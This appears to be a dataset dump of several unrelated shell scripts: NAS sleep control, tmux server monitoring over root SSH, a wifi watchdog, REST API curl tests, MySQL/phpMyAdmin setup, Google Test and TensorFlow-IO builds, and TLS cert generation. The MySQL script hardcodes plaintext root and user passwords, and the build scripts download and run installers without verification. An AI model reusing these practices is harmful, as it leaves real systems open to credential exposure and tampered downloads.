blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
8559e22aa52e3e4ae8156bcb17d79791c010e467
|
Shell
|
haithemsekri/MyTools
|
/nas-disks/wait_until_idle.sh
|
UTF-8
| 520
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
while true;
do
echo "wait until idle"
#/usr/bin/wait_until_idle 95 32768 100 #Delay time until sleep 10x100=16.6mins
/usr/bin/wait_until_idle 95 2048 60 10 100
echo "idle"
systemctl stop smbd nmbd
/usr/bin/udev-disk-attach.sh --cmd poweroff --dev all --keep no
ethtool -s enp2s0 wol g
systemctl hybrid-sleep
echo "enter sleep: " $(date)
sleep 2
sleep 2
echo "exit sleep: " $(date)
/usr/bin/udev-disk-attach.sh --cmd poweron --dev all --keep no
systemctl restart smbd nmbd
echo "Mount OK Restart"
done
| true
|
c030131faa0e80faf85dd0042fb4b9a161f194de
|
Shell
|
the-bugs-bunny/core-php
|
/.scripts/composer_post_install_cmd.sh
|
UTF-8
| 155
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
DIR="$PWD/.git/hooks/"
if [ -d "$DIR" ]; then
cp ./.scripts/git_pre_commit.sh .git/hooks/pre-commit
chmod +x .git/hooks/pre-commit
fi
| true
|
e59cc7301324c6634c2ab7fa43846ec2a2232dfb
|
Shell
|
intrig-unicamp/ixp-ptt-br
|
/analysis/Adjacencies/peeringMatrixByProfile/runPeeringMatrix.sh
|
UTF-8
| 1,173
| 3.453125
| 3
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
if [ $# -ne 1 ]; then
echo "Usage $0 <state>"
echo "e.g., $0 sp"
exit
fi
read -p "Confirm that you have profile_separator, data and order folders and press [Enter] key ..."
state=$1
if [ ! -f data/ptt_$state.txt ]; then
echo Data file not found!
echo Expected: data/ptt_$state.txt
exit
fi
if [ ! -f order/order_$state.txt ]; then
echo File containing order of ASes not found!
echo Expected: order/order_$state.txt
exit
fi
if [ ! -f profile_separator/profile_separator_$state.txt ]; then
echo File containing profiles of ASes not found!
echo Expected: profile_separator/profile_separator_$state.txt
exit
fi
BASEDIR=/disk/PTT/ixp-ptt-br/analysis/Adjacencies/peeringMatrixByProfile
state=$1
$BASEDIR/peeringMatrixByProfile.sh data/ptt_$state.txt order/order_$state.txt
tmp1=matrix_profile_tmp
$BASEDIR/profile_separator.sh profile_separator/profile_separator_$state.txt peeringMatrix_$state.txt > $tmp1
$BASEDIR/removeZeros.sh $tmp1 > noZeros
$BASEDIR/connectivityScale.sh noZeros > matrix_$state.txt
$BASEDIR/generatePlt.sh matrix_$state.txt profile_separator/profile_separator_$state.txt
rm -f $tmp1 noZeros 2> /dev/null
| true
|
2da1d429365493937466056674b10c381eab2152
|
Shell
|
Junch/ios-cmake
|
/toolchain/build-gtest.sh
|
UTF-8
| 3,804
| 4.21875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
if ! type cmake > /dev/null; then
echo "cmake is not installed. Please install it first."
exit
fi
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Preparing to build Google Test for iOS"
echo "###################################################################"
echo "$(tput sgr0)"
# The results will be stored relative to the location
# where you stored this script, **not** relative to
# the location of the protobuf git repo.
PREFIX=`pwd`/googletest
if [ -d ${PREFIX} ]
then
rm -rf "${PREFIX}"
fi
mkdir -p "${PREFIX}/platform"
GTEST_VERSION=1.8.0
GTEST_RELEASE_URL=https://github.com/google/googletest/archive/release-${GTEST_VERSION}.tar.gz
GTEST_RELEASE_DIRNAME=googletest-release-${GTEST_VERSION}
GTEST_SRC_DIR=/tmp/googletest
echo "PREFIX ..................... ${PREFIX}"
echo "GTEST_VERSION .............. ${GTEST_VERSION}"
echo "GTEST_RELEASE_URL .......... ${GTEST_RELEASE_URL}"
echo "GTEST_RELEASE_DIRNAME ...... ${GTEST_RELEASE_DIRNAME}"
echo "GTEST_SRC_DIR .............. ${GTEST_SRC_DIR}"
while true; do
read -p "Proceed with build? (y/n) " yn
case $yn in
[Yy]* ) break;;
[Nn]* ) exit;;
* ) echo "Please answer yes or no.";;
esac
done
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Fetch Google Test"
echo "###################################################################"
echo "$(tput sgr0)"
(
if [ -d ${GTEST_SRC_DIR} ]
then
rm -rf ${GTEST_SRC_DIR}
fi
cd `dirname $GTEST_SRC_DIR}`
if [ -d ${GTEST_RELEASE_DIRNAME} ]
then
rm -rf "${GTEST_RELEASE_DIRNAME}"
fi
curl --location ${GTEST_RELEASE_URL} --output ${GTEST_RELEASE_DIRNAME}.tar.gz
tar xf ${GTEST_RELEASE_DIRNAME}.tar.gz
mv "${GTEST_RELEASE_DIRNAME}" "${GTEST_SRC_DIR}"
#rm ${GTEST_RELEASE_DIRNAME}.tar.gz
)
function build_lib()
{
PLATFORM=$1
FOLDER=$2
DESC=$3
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# ${DESC}"
echo "###################################################################"
echo "$(tput sgr0)"
(
mkdir ${GTEST_SRC_DIR}/${FOLDER}> /dev/null
pushd ${GTEST_SRC_DIR}/${FOLDER}> /dev/null
cmake .. -DCMAKE_TOOLCHAIN_FILE="${PREFIX}/../ios.cmake" -DIOS_PLATFORM="${PLATFORM}"
make
outDir=${PREFIX}/platform/"${FOLDER}"
mkdir -p ${outDir}
cp -R googlemock/libgmock*.a ${outDir}
cp -R googlemock/gtest/libgtest*.a ${outDir}
popd > /dev/null
)
}
build_lib SIMULATOR i386-sim "i386 for iOS Simulator"
build_lib SIMULATOR64 x86_64-sim "x86_64 for iOS Simulator"
build_lib OS arm-ios "armv7 armv7s x86_64 arm64 for iOS"
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Create Universal Libraries and Finalize the packaging"
echo "###################################################################"
echo "$(tput sgr0)"
function create_universal()
{
MODULE=$1
lipo -create i386-sim/"${MODULE}" x86_64-sim/"${MODULE}" arm-ios/"${MODULE}" -output universal/"${MODULE}"
}
(
cd ${PREFIX}/platform
mkdir universal
arr=(libgtest.a libgtest_main.a libgmock.a libgmock_main.a)
for i in "${arr[@]}"
do
create_universal $i
done
)
(
cd ${PREFIX}
mkdir lib
mkdir include
cp -R platform/universal/* lib
cp -R ${GTEST_SRC_DIR}/googlemock/include/* include
cp -R ${GTEST_SRC_DIR}/googletest/include/* include
rm -rf platform
lipo -info lib/libgtest.a
lipo -info lib/libgtest_main.a
lipo -info lib/libgmock.a
lipo -info lib/libgmock_main.a
)
echo Done!
| true
|
fe017154f99109b394ee6727133709b6cf668b96
|
Shell
|
geodis/tools
|
/monitoreo-servers_tmux.sh
|
UTF-8
| 2,227
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Paneles
# +---------------------+-----------------------+
# | 0 | 1 |
# +---------------------+-----------------------+
# | 2 | |
# +---------------------+ 4 |
# | 3 | |
# +---------------------+-----------------------+
# | 5 | 6 |
# +---------------------+-----------------------+
connect_ldap="ssh root@ldap-server"
connect_mail="ssh root@mail"
connect_proxy="ssh root@proxy"
time_out=2
tmux has-session
if [ $? == 0 ]
then
# Division
tmux split-window -v -p 30
tmux select-pane -t 0
tmux split-window -v -p 60
tmux select-pane -t 0
tmux select-pane -t 1
tmux select-pane -t 2
tmux select-pane -t 0
tmux split-window -h -p 50
tmux select-pane -t 2
tmux split-window -h -p 50
tmux select-pane -t 2
tmux split-window -v -p 20
tmux select-pane -t 5
tmux split-window -h -p 50
tmux display-panes
# +-------------------+
# | ldap-server |
# +-------------------+
tmux select-pane -t 0
tmux send-keys "$connect_ldap" C-m
sleep $time_out
tmux send-keys "glances" C-m
# +-------------+
# | mail |
# +-------------+
#
tmux select-pane -t 2
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys "glances" C-m
tmux select-pane -t 3
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys 'watch -n100 "ls /var/lib/mailman/data/held*"' C-m
tmux select-pane -t 4
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys "mail_queue_watch.sh" C-m
# +-------------+
# | proxy |
# +-------------+
#
tmux select-pane -t 5
tmux send-keys "$connect_proxy" C-m
sleep $time_out
tmux send-keys 'glances' C-m
tmux select-pane -t 6
tmux send-keys "$connect_proxy" C-m
sleep $time_out
tmux send-keys 'nload' C-m
# FIX
tmux select-pane -t 1
# tmux send-keys "$connect_ldap" C-m
# sleep $time_out
tmux send-keys "logout" C-m
# /FIX
fi
| true
|
56c508c725c55508bebccaa0ac5cd36f3456e975
|
Shell
|
Yagami2013/scripts
|
/operate_app.sh
|
UTF-8
| 814
| 3.046875
| 3
|
[] |
no_license
|
#/bin/bash
pkg="com.zfdang.zsmth_android";
getStartTime(){
[ -n "$1" ]&& pkg=$1;
local MainPage=${pkg}"/.MainActivity";
startTime=`adb shell am start -W $MainPage | grep "TotalTime"|awk -F: '{print $2}'`;
echo $startTime;
}
getFlow(){
uid=`adb shell dumpsys package $pkg | grep userId|awk -F '=' '{print $2}'`;
flow=`adb shell cat /proc/net/xt_qtaguid/stats | grep $uid|awk '{data[NR]+=$6+$8;sum=0;}END{for(k in data) sum+=data[k];print (sum/1024)}'`;
echo $flow;
}
getBattery(){
[ -n "$1" ]&¶m=$1||param="level";
adb shell dumpsys battery|grep -E $param| awk -F: '{print $2}';
}
closeApp(){
[ -n "$1" ]&&pkg=$1;
adb shell am force-stop $pkg;
}
installApp(){
[ -n "$1" ] && apk=$1 || apk="./apk/zsmth.apk";
adb install $apk
}
uninstall(){
[ -n "$1" ]&& pkg=$1;
adb shell pm uninstall $pkg;
}
| true
|
3c4a28bdadd69c18135104661bca23f0c6357017
|
Shell
|
sanketshahc/deeplearning_cnns
|
/organize_classes.sh
|
UTF-8
| 271
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
MYDIR="${PWD}";
for FLE in ${MYDIR}/resources/test_images/*.jpg;
do
FNAME=$(echo $(basename ${FLE}) | sed 's/_[0-9].*//g');
# echo $FLE
DEST="${MYDIR}/resources/test_images/${FNAME}"
# printf $FLE
mkdir -pv ${DEST};
# echo ${DEST}
mv ${FLE} ${DEST};
done
| true
|
ee6b99b774c505fa0d445af94bb93b29fd00a5c3
|
Shell
|
jinahya/jinahya
|
/com.googlecode.jinahya.test/basic-restful-webapp/items.sh
|
UTF-8
| 3,924
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/sh
item_xml_size=$(stat -c%s "src/test/resources/item.xml")
item_json_size=$(stat -c%s "src/test/resources/item.json")
echo ------------------------------------ creating on /items with an xml content
curl -i -X POST http://localhost:58080/items -H "Content-type: application/xml" --data "@src/test/resources/item.xml"
#echo -------------------------------------------- reading /items/1 in xml format
#curl -s http://localhost:58080/items/1 -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------- reading /items/1 in json format
curl -s http://localhost:58080/items/1 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------- updating /items/1 with a json content
curl -i -X PUT http://localhost:58080/items/1 -H "Content-type: application/json" --data "@src/test/resources/item.json"
echo -------------------------------------------- reading /items/1 in xml format
curl -s http://localhost:58080/items/1 -H "Accept: application/xml" | xmllint --format -
#echo ------------------------------------------- reading /items/1 in json format
#curl -s http://localhost:58080/items/1 -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
echo ------------------------------------ creating on /items with a json content
curl -i -X POST http://localhost:58080/items -H "Content-type: application/json" --data "@src/test/resources/item.json"
#echo -------------------------------------------- reading /items/2 in xml format
#curl -s http://localhost:58080/items/2 -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------- reading /items/2 in json format
curl -s http://localhost:58080/items/2 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------- updating /items/2 with an xml content
curl -i -X PUT http://localhost:58080/items/2 -H "Content-type: application/xml" --data "@src/test/resources/item.xml"
echo -------------------------------------------- reading /items/2 in xml format
curl -s http://localhost:58080/items/2 -H "Accept: application/xml" | xmllint --format -
#echo ------------------------------------------- reading /items/2 in json format
#curl -s http://localhost:58080/items/2 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------------- reading all items in xml format
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format -
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format - > target/items.xml
echo ------------------------------------------ reading all items in json format
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool > target/items.json
echo --------------------------------------------------------- deleting /items/0
curl -i -X DELETE http://localhost:58080/items/1
echo --------------------------------------------------- trying to read /items/1
curl --fail http://localhost:58080/items/1
echo --------------------------------------------------------- deleting /items/2
curl -i -X DELETE http://localhost:58080/items/2
echo --------------------------------------------------- trying to read /items/2
curl --fail http://localhost:58080/items/2
echo ------------------------------------------- reading all items in xml format
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------ reading all items in json format
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items.xsd | xmllint --format -
curl -s http://localhost:58080/items.jsd | python -m json.tool
| true
|
262d836f374a03516081ae948d7947a0b3be2667
|
Shell
|
kylemarsh/broodmon
|
/netmon.sh
|
UTF-8
| 679
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
# Hacky little script to check if the network connection is working and
# kick the wifi interface if it's not. Hopefully this fixes some of the
# dropout issues I see sometimes.
if ! ping 192.168.1.1 -c2
then
echo -n "Network down at `date`.." >> /home/pi/monitoring/pingmon.log;
ifdown wlan0; echo -n "droping wlan0 ($?).." >> /home/pi/monitoring/pingmon.log;
sleep 5s;
ifup wlan0; echo "raising wlan0 ($?)" >> /home/pi/monitoring/pingmon.log;
fi
#### Notes ####
#ping 192.168.1.1 -c2 | tail -2 | head -1 >> /home/pi/monitoring/pingmon.log
#ping 192.168.1.1 -c2 || (ifdown wlan0; ifup wlan0)
#tail -1 monitoring/pingmon.log | grep '0% packet loss' && echo foo
| true
|
a390c58bf012806d4a556241a4717e0e1d881f2f
|
Shell
|
jamalansari84/ubuntu-setup
|
/extras/mysql.sh
|
UTF-8
| 1,794
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
function update {
sudo apt update
sudo apt upgrade -y
sudo apt autoremove -y
}
function status {
sudo ufw status
sudo systemctl restart apache2 mysql
sudo systemctl --no-pager status apache2 mysql
}
# Variables
# --------------------------------------
MYSQL_USER_NAME="admin"
MYSQL_USER_PASSWORD="senha123*A"
MYSQL_ROOT_PASSWORD="@SuperSenhaRoot*098"
PHPMYADMIN_PASSWORD="@SuperSenhaPhpMyAdmin*099"
PHPINI="$(locate -l 1 php.ini)"
# --------------------------------------
# Securing PhpMyAdmin
# --------------------------------------
sudo systemctl stop apache2
sudo sed -i 's/DirectoryIndex index.php/DirectoryIndex index.php\n AllowOverride All/g' /etc/apache2/conf-available/phpmyadmin.conf
sudo systemctl start apache2
update
status
# --------------------------------------
#sudo mysqladmin -u root password $MYSQL_ROOT_PASSWORD
#sudo mysql -u root --password=$MYSQL_ROOT_PASSWORD -e "ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '$MYSQL_ROOT_PASSWORD';"
# Working
# --------------------------------------
#sudo mysql -u root -e "ALTER USER 'root'@'localhost' IDENTIFIED BY '$MYSQL_ROOT_PASSWORD';"
#sudo systemctl stop mysql
#sudo mysqld -init-file=~/mysql-pwd
#sudo systemctl start mysql
#mysql -u root --password=$MYSQL_ROOT_PASSWORD
# --------------------------------------
#sudo systemctl restart mysql
#sudo mysql -u root -e "UPDATE mysql.user SET Password=PASSWORD('$MYSQL_ROOT_PASSWORD') WHERE User='root'"
#sudo mysql -u root -e "SET PASSWORD FOR root@localhost = PASSWORD('$MYSQL_ROOT_PASSWORD');FLUSH PRIVILEGES;"
#sudo mysql -u root -B -N -e "SHOW STATUS LIKE 'Uptime'"
#sudo mysql -u root --password=$MYSQL_ROOT_PASSWORD -e "SELECT User, Authentication_string, Plugin FROM mysql.user"
#CD /var/www
#sudo chow $USER:$USER html/ -R
| true
|
f90b1b4b6fd84a7024feb46f18bcbdb7ecbf74fc
|
Shell
|
hxin/OntoSuite-Miner
|
/lib/ensembl-api/ensembl-functgenomics/scripts/environments/config.sequencing.example
|
UTF-8
| 2,011
| 2.78125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/local/bin/bash
# Copyright [1999-2013] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ -z "$EFG_SRC" ] || [ ! -d $EFG_SRC ]; then
echo ":: You have not yet initialised the eFG environment"
return
fi
. $EFG_SRC/scripts/environments/sequencing.env
export DB_PASS=$1
if [[ ! $DB_PASS ]]; then
echo "Need to pass a password as parameter"
return 1
fi
### THIS IS AN EXAMPLE CONFIG FILE
### PLEASE MAKE A COPY OF THIS (e.g. my_homo_sapiens_68.sequencing)
### BEFORE ADDING ANY SPECIFIC CONFIG
export SPECIES='homo_sapiens'
#schema version of the database and has to change for each new release
export SCHEMA_BUILD='68_37'
#filename of the fasta assmbly file
export ASSEMBLY="GRCh37_${SCHEMA_BUILD}"
#change for human
export DB_HOST=your_db_host
export DB_PORT=3306
export DB_USER=your_write_user
export DB_READ_USER=your_read_users
export DB_NAME="your_${SPECIES}_funcgen_${SCHEMA_BUILD}"
#core data base parameters with read only permissions
#Change/add to template
#mirror copy of the ensembl for internal use
export DNADB_HOST=your_dnadb_host # e.g. ensembldb.ensembl.org
#DB name of the core database
export DNADB_NAME="${SEPCIES}_core_${SCHEMA_BUILD}"
export DNADB_USER=ensro
export DNADB_PORT=3306
#real data
export DATA_HOME=/path/to/your/work/area
#Only if need to override in general sequencing.config
#export VALID_PEAK_ANALYSIS='SWEMBL_R015 SWEMBL_R0025 CCAT_HISTONE'
_InitEnv
| true
|
6bf9b717c116b71f58d1a785a76e4b2183ac4135
|
Shell
|
berrym/zsh-config
|
/.zsh/third-party/third-party.zsh
|
UTF-8
| 322
| 2.859375
| 3
|
[] |
no_license
|
local autosuggest=zsh-autosuggestions/zsh-autosuggestions.zsh
local syntax-highlighting=zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
third-party-scripts=(
${ZDOTDIR:-$ZSH_THIRD_PARTY_DIR}/$autosuggest
${ZDOTDIR:-$ZSH_THIRD_PARTY_DIR}/$syntax-highlighting
)
for f in $third_party_scripts; do
. $f
done
| true
|
a879eb1179e9d91c4414beac077db35a28565ba9
|
Shell
|
alidad1401/OpenNeuro_analyses
|
/reuse_analyses/reuse_identification/check_no_match.sh
|
UTF-8
| 515
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
cat no_match.txt | while read line; do
file="$(echo "$line"| gsed 's/[^[:alnum:][:space:]]\+//g' | tr -s ' ' )"
file_no_trailing_space="${file%% }.pdf"
file_no_outer_spaces="${file_no_trailing_space## }"
open "papers/all_papers/$file_no_outer_spaces"
echo "$line"
read -p "If you need to re-download the paper, enter the url here. Otherwise, just hit 'return': " url </dev/tty
if [ -n "$url" ]; then
rm "papers/all_papers/$paper_name"
curl "$url" -o "papers/all_papers/$paper_name"
fi
done
| true
|
2eab1b9f8d798c81a05faf66b93fc33570d03545
|
Shell
|
jakethekoenig/personal-site
|
/backend/deploy.sh
|
UTF-8
| 407
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
RUN_DIR=$(pwd)
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd $SCRIPT_DIR
# Deploy lambda endpoint that catches comments
cd catchcomments
code="cloudtmp.zip" # TODO: ensure this doesn't already exist
zip $code -r *
aws lambda update-function-code --function-name arn:aws:lambda:us-east-2:472039641776:function:addComment --zip-file fileb://$code --region us-east-2
rm $code
| true
|
3de529c0da57fd191797d8d81310e589df0aa456
|
Shell
|
wookayin/tensorflow-io
|
/.travis/python.release.sh
|
UTF-8
| 2,707
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
set -e -x
# Release:
# docker run -i -t --rm -v $PWD:/v -w /v --net=host ubuntu:14.04 /v/.travis/python.release.sh
export BAZEL_VERSION=0.20.0 BAZEL_OS=linux
DEBIAN_FRONTEND=noninteractive apt-get -y -qq update
DEBIAN_FRONTEND=noninteractive apt-get -y -qq install \
software-properties-common > /dev/null
DEBIAN_FRONTEND=noninteractive add-apt-repository -y ppa:deadsnakes/ppa
DEBIAN_FRONTEND=noninteractive apt-get -y -qq update
DEBIAN_FRONTEND=noninteractive apt-get -y -qq install \
gcc g++ make patch \
python \
python3 \
python3.5 \
python3.6 \
unzip \
curl > /dev/null
curl -sOL https://github.com/bazelbuild/bazel/releases/download/${BAZEL_VERSION}/bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
chmod +x bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
# Install bazel, display log only if error
./bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh 2>&1 > bazel-install.log || (cat bazel-install.log && false)
rm -rf bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
rm -rf bazel-install.log
curl -OL https://nixos.org/releases/patchelf/patchelf-0.9/patchelf-0.9.tar.bz2
tar xfa patchelf-0.9.tar.bz2
(cd patchelf-0.9 && ./configure --prefix=/usr && make && make install)
rm -rf patchelf-0.9*
curl -sOL https://bootstrap.pypa.io/get-pip.py
python3.6 get-pip.py
python3.5 get-pip.py
python3 get-pip.py
python get-pip.py
rm -rf get-pip.py
python3 -m pip install -q auditwheel==1.5.0
python3 -m pip install -q wheel==0.31.1
if [[ ! -z ${TENSORFLOW_INSTALL} ]]; then
python -m pip install -q ${TENSORFLOW_INSTALL}
fi
./configure.sh
bazel build \
--noshow_progress \
--noshow_loading_progress \
--verbose_failures \
--test_output=errors -- \
//tensorflow_io/...
python setup.py --data bazel-bin -q bdist_wheel "$@"
python3 setup.py --data bazel-bin -q bdist_wheel "$@"
python3.5 setup.py --data bazel-bin -q bdist_wheel "$@"
python3.6 setup.py --data bazel-bin -q bdist_wheel "$@"
for f in dist/*.whl; do
auditwheel repair $f
done
| true
|
efde33520be71c50b23d096c76a6e6ef4645a18b
|
Shell
|
luc-zago/exercicios-trybe
|
/Módulo 1 - Fundamentos de desenvolvimento web/Bloco 1 - Unix, Bash e Shell Script/exercicio4.sh
|
UTF-8
| 505
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
echo "Programa que verifica se o caminho até um arquivo existe e, caso o caminho exista, verifica se você tem permissão para editar o arquivo"
echo "O caminho para qual diretório você gostaria de verificar?"
read arq
if [ "`pwd` $arq"=true ]
then echo "O caminho para $arq está habilitado!"
else
echo "O caminho para $arq não está habilitado."
fi
if [ -w $arq ]
then echo "Você tem permissão para editar $arq"
else
echo "Você NÃO foi autorizado a editar $arq"
fi
| true
|
5c7317bbf1d0401e4d564053115c54ee0e1f07bc
|
Shell
|
redis/redis-py
|
/dockers/stunnel/create_certs.sh
|
UTF-8
| 1,102
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
DESTDIR=`dirname "$0"`/keys
test -d ${DESTDIR} || mkdir ${DESTDIR}
cd ${DESTDIR}
SSL_SUBJECT="/C=CA/ST=Winnipeg/L=Manitoba/O=Some Corp/OU=IT Department/CN=example.com"
which openssl &>/dev/null
if [ $? -ne 0 ]; then
echo "No openssl binary present, exiting."
exit 1
fi
openssl genrsa -out ca-key.pem 2048 &>/dev/null
openssl req -new -x509 -nodes -days 365000 \
-key ca-key.pem \
-out ca-cert.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
openssl req -newkey rsa:2048 -nodes -days 365000 \
-keyout server-key.pem \
-out server-req.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
openssl x509 -req -days 365000 -set_serial 01 \
-in server-req.pem \
-out server-cert.pem \
-CA ca-cert.pem \
-CAkey ca-key.pem &>/dev/null
openssl req -newkey rsa:2048 -nodes -days 365000 \
-keyout client-key.pem \
-out client-req.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
openssl x509 -req -days 365000 -set_serial 01 \
-in client-req.pem \
-out client-cert.pem \
-CA ca-cert.pem \
-CAkey ca-key.pem &>/dev/null
echo "Keys generated in ${DESTDIR}:"
ls
| true
|
2da1d8ee6181cbd5832863c878098f7e79df06ca
|
Shell
|
stormlovetao/rnaSeq
|
/Align2ViralGenS1.sh
|
UTF-8
| 942
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#########################
#
#This script aims to align all unmapped samples to Viral/Bacterial genomes.
# version: V-0.0.0
# 1. Download Viral/Bacterial genomes from NCBI(ftp://ftp.ncbi.nlm.nih.gov/genomes/Viruses/) to local server
# 2. Use Bowtie/SNAP to build index of reference genomes.
# 3. Use Bowtie/SNAP to map samples to indexes.
#
# This script use SNAP as default aligner. And perform the part 2.
#########################
module use /apps/modulefiles/test
module load snap/1.0.20
viruses_root_dir=/data/neurogen/Tao/fna/Viral/ftp.ncbi.nlm.nih.gov/genomes/Viruses
for viruses_dir in $viruses_root_dir/*
do
if test -d $viruses_dir
then
viruses_name=${viruses_dir##*/}
if [[ -f $viruses_dir/${viruses_name}".fna" ]]; then
bsub -q "short" -J ${viruses_name}":Indexing" -oo $viruses_dir/snap_index_jobout snap-aligner index $viruses_dir/${viruses_name}".fna" $viruses_dir/snap_index/
fi
fi
done
| true
|
eac126819c1a6d780d861d972c1cc32aee0cbc04
|
Shell
|
AG7GN/hamapps
|
/updatepi.sh
|
UTF-8
| 13,305
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# YAD/shell script to install or update certain ham applications, as well as
# update Raspbian OS and apps.
VERSION="1.77.7"
function Help () {
BROWSER="$(command -v chromium-browser)"
declare -A APPS
APPS[fldigi]="http://www.w1hkj.com/FldigiHelp"
APPS[flmsg]="http://www.w1hkj.com/flmsg-help"
APPS[flamp]="http://www.w1hkj.com/flamp-help"
APPS[flrig]="http://www.w1hkj.com/flrig-help"
APPS[flwrap]="http://www.w1hkj.com/flwrap-help"
APPS[direwolf]="https://github.com/wb2osz/direwolf"
APPS[pat]="https://getpat.io/"
APPS[arim]="https://www.whitemesa.net/arim/arim.html"
APPS[piardop]="https://www.whitemesa.net/arim/arim.html"
APPS[chirp]="https://chirp.danplanet.com/projects/chirp/wiki/Home"
APPS[wsjtx]="https://physics.princeton.edu/pulsar/K1JT/wsjtx.html"
APPS[xastir]="http://xastir.org/index.php/Main_Page"
APPS[nexus-backup-restore.sh]="https://github.com/AG7GN/nexus-backup-restore/blob/master/README.md"
APPS[hamapps]="https://github.com/AG7GN/hamapps/blob/master/README.md"
APPS[nexus-iptables]="https://github.com/AG7GN/nexus-iptables/blob/master/README.md"
APPS[nexus-utilities]="https://github.com/AG7GN/nexus-utilities/blob/master/README.md"
APPS[autohotspot]="https://github.com/AG7GN/autohotspot/blob/master/README.md"
APPS[710.sh]="https://github.com/AG7GN/kenwood/blob/master/README.md"
APPS[pmon]="https://www.p4dragon.com/en/PMON.html"
APPS[nexus-rmsgw]="https://github.com/AG7GN/rmsgw/blob/master/README.md"
APPS[js8call]="http://js8call.com"
APPS[linbpq]="http://www.cantab.net/users/john.wiseman/Documents/InstallingLINBPQ.html"
APP="$2"
$BROWSER ${APPS[$APP]} 2>/dev/null &
}
export -f Help
function GenerateTable () {
# Takes 1 argument: The first word of the middle button ("Select" or "Unselect")
ANS="$(yad --center --title="Update Apps/OS - version $VERSION" --list --borders=10 \
--height=600 --width=900 --text-align=center \
--text "<b>This script will install and/or check for and install updates for the apps you select below.\n \
If there are updates available, it will install them.</b>\n\n \
<b><span color='blue'>For information about or help with an app, double-click the app's name.</span></b>\n \
This will open the Pi's web browser.\n \
This Pi must be connected to the Internet for this script to work.\n\n \
<b><span color='red'>CLOSE ALL OTHER APPS</span></b> <u>before</u> you click OK.\n" \
--separator="," --checklist --grid-lines=hor \
--dclick-action="bash -c \"Help %s\"" \
--auto-kill --column Pick --column Applications --column Description \
--column Action < "$TFILE" --buttons-layout=center --button=Cancel:1 --button="$1 All Installed":2 --button=OK:0)"
}
function GenerateList () {
# Takes 1 argument: 0 = Pick boxes for installed apps are not checked, 1 = Pick boxes for installed apps are checked.
TFILE="$(mktemp)"
declare -a CHECKED
CHECKED[0]="FALSE"
CHECKED[1]="TRUE"
